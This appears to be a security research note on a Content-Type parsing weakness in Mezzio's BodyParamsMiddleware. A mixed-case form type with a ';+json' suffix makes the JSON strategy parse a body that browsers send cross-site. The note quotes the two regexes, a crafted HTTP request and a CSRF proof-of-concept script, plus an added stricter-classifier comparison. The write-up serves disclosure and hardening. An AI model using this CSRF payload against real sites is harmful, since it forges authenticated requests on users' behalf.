Endpoint
$app->pipe(BodyParamsMiddleware::class);
...
public function indexAction() {
    $request = $this->getRequest();
    ...
}
Source code
By default, BodyParamsMiddleware composes the following strategies:
- Mezzio\Helper\BodyParams\FormUrlEncodedStrategy
- Mezzio\Helper\BodyParams\JsonStrategy
/mezzio/mezzio-helpers/src/BodyParams/FormUrlEncodedStrategy.php
class FormUrlEncodedStrategy implements StrategyInterface
{
    public function match(string $contentType) : bool
    {
        // No "i" modifier: the comparison is case-sensitive.
        return 1 === preg_match('#^application/x-www-form-urlencoded($|[ ;])#', $contentType);
    }
    ...
}
/mezzio/mezzio-helpers/src/BodyParams/JsonStrategy.php
class JsonStrategy implements StrategyInterface
{
    public function match(string $contentType) : bool
    {
        // [\S]+ accepts any run of non-whitespace characters, ";" included, before "+json".
        return 1 === preg_match('#^application/(|[\S]+\+)json($|[ ;])#', $contentType);
    }
    ...
}
JSON Content-Type
application/XXX;+json
HTTP Request
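The type must be written in a different letter case so that the case-sensitive FormUrlEncodedStrategy pattern does not match and the JsonStrategy pattern is the one that matches.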
POST /json HTTP/1.1
Host: localhost
Content-Type: application/x-WWW-Form-urlencoded;+json
Content-Length: 13

{"test":true}
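Added example (not from the original page or from Mezzio): the two match() patterns quoted above applied to a few constructed Content-Type values, next to a hypothetical stricter classifier that compares only the lowercased media type before the first ";". The function names and the first-match ordering of the strategies are assumptions.

```php
<?php
// Added example, not Mezzio code. The two patterns are copied from the page.
const FORM_RE = '#^application/x-www-form-urlencoded($|[ ;])#';
const JSON_RE = '#^application/(|[\S]+\+)json($|[ ;])#';

// Assumption: strategies are tried in the order the page lists them, first match wins.
function pageClassify(string $contentType): string
{
    if (1 === preg_match(FORM_RE, $contentType)) {
        return 'form';
    }
    return 1 === preg_match(JSON_RE, $contentType) ? 'json' : 'none';
}

// Hypothetical stricter check: drop parameters, trim and lowercase the media
// type, then accept only application/json or application/<name>+json.
function strictClassify(string $contentType): string
{
    $type = strtolower(trim(explode(';', $contentType, 2)[0]));
    if ($type === 'application/x-www-form-urlencoded') {
        return 'form';
    }
    return 1 === preg_match('~^application/([a-z0-9!#$&^_.+-]+\+)?json$~', $type)
        ? 'json' : 'none';
}

// Constructed sample headers; the third and fourth are the values shown on the page.
$samples = [
    'application/json',
    'application/x-www-form-urlencoded',
    'application/x-WWW-Form-urlencoded;+json',
    'application/XXX;+json',
    'application/vnd.api+json; charset=utf-8',
    'text/plain;+json',
];

foreach ($samples as $header) {
    printf("%-42s page=%-5s strict=%s\n", $header, pageClassify($header), strictClassify($header));
}
```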
CSRF PoC
<script>
fetch('http://localhost/json',{
method:'POST',
headers:{'Content-Type':'application/x-WWW-Form-urlencoded;+json'},
body:'{"test":true}',
credentials: 'include'
})
</script>
Multipart Content-Type
Same as PHP